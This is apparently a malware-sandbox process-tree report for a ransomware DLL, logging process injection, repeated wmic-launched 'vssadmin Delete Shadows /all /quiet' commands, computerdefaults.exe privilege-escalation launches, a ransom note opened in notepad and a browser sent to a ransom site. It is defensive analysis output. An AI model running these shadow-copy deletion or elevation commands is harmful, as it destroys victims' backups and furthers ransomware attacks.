PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142
PID 3800 wrote to memory of 3892	3800	msedge.exe	142

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
- Modifies registry class
PID:2868
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:6008
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3556
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5908
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3276
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5144
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2924
- C:\Windows\system32\notepad.exe
  notepad.exe C:\Users\Public\readme.txt
  2⤵
  - Opens file in notepad (likely ransom note)
  PID:2996
- C:\Windows\system32\cmd.exe
  cmd /c "start http://2cc03a300254d290c0diteiyb.topsaid.site/diteiyb^&2^&55932014^&72^&273^&2219041"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2860
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://2cc03a300254d290c0diteiyb.topsaid.site/diteiyb&2&55932014&72&273&2219041
    3⤵
    - Enumerates system info in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory
    PID:3800
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xbc,0x128,0x7ffeaf0546f8,0x7ffeaf054708,0x7ffeaf054718
      4⤵
      PID:4656
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
      4⤵
      PID:3892
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 /prefetch:3
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4768
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2956 /prefetch:8
      4⤵
      PID:288
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3292 /prefetch:1
      4⤵
      PID:3312
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3300 /prefetch:1
      4⤵
      PID:4364
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4080 /prefetch:1
      4⤵
      PID:2268
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4912 /prefetch:1
      4⤵
      PID:3032
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
      4⤵
      PID:2428
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5280 /prefetch:1
      4⤵
      PID:2920
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8
      4⤵
      PID:728
  - - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3444 /prefetch:8
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:4028
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5256 /prefetch:1
      4⤵
      PID:2012
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5348 /prefetch:1
      4⤵
      PID:3584
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1
      4⤵
      PID:5876
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1076 /prefetch:1
      4⤵
      PID:5424
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,8822166676604263987,2928354353397920679,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1284 /prefetch:2
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:2840
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4376
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4852
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4628
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:368
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2788

C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:2068
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5600
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:6056
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5864
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5656
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5920

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3408
- C:\Windows\system32\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\c752934305e1b89f82798ea2c26f70b3_JaffaCakes118.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:2196
- - C:\Windows\system32\wbem\wmic.exe
    C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4048
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4936
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:2772
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5060
  - - C:\Windows\system32\wbem\WMIC.exe
      C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
      4⤵
      PID:8
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5568
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5764
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4784
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5680
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5256

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
- Modifies registry class
PID:3544
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:3556
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3612
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3444
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:1972
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:2028

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
- Modifies registry class
PID:3740
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:6056
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5408
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3612
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5180
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5644
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:4600

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
1⤵
- Modifies registry class
PID:3832
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:4716
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2152
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:3552

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
PID:3896
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5392
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5404
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5652
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5412
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5584

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
1⤵
PID:3988

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:4172
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:5364
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5636
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5804
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:5544
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:5308

C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\InputApp\TextInputHost.exe" -ServerName:InputApp.AppX9jnwykgrccxc8by3hsrsh07r423xzvav.mca
1⤵
- Modifies registry class
PID:3844
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:1512
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4944
- C:\Windows\system32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4240

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Modifies registry class
- Suspicious use of UnmapMainImage
PID:3696
- C:\Windows\system32\wbem\wmic.exe
  C:\Windows\system32\wbem\wmic process call create "vssadmin.exe Delete Shadows /all /quiet"
  2⤵
  PID:6132
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:2292
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:3812
- C:\Windows\System32\cmd.exe
  cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c computerdefaults.exe""
  2⤵
  PID:4912
- - C:\Windows\system32\wbem\WMIC.exe
    C:\Windows\system32\wbem\wmic process call create "cmd /c computerdefaults.exe"
    3⤵
    PID:728

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:3008

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1736

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:4940
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:1176

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2024
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4816
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:3580

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
PID:4440

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:4432
- C:\Windows\System32\Conhost.exe
  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  2⤵
  PID:4628

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3952

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2364

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1072
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:2896
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4448

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:1660
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:3236
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:4600

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1768

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1740

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2632

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3552

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5168

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5184
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5384
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5712

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5204
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5364
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5604

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5744

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5780
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6040
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5224

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5872
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:6132
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5128

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5880

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6020

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:3276

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5240

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:5184

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5216
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5744
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:6108

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5680
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
  2⤵
  PID:5416
- - C:\Windows\system32\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
    3⤵
    PID:5712

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:2224

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:6068

C:\Windows\system32\vssadmin.exe
vssadmin.exe Delete Shadows /all /quiet
1⤵
- Process spawned unexpected child process
- Interacts with shadow copies
PID:1196

C:\Windows\system32\cmd.exe
cmd /c computerdefaults.exe
1⤵
- Process spawned unexpected child process
PID:5240
- C:\Windows\system32\ComputerDefaults.exe
  computerdefaults.exe
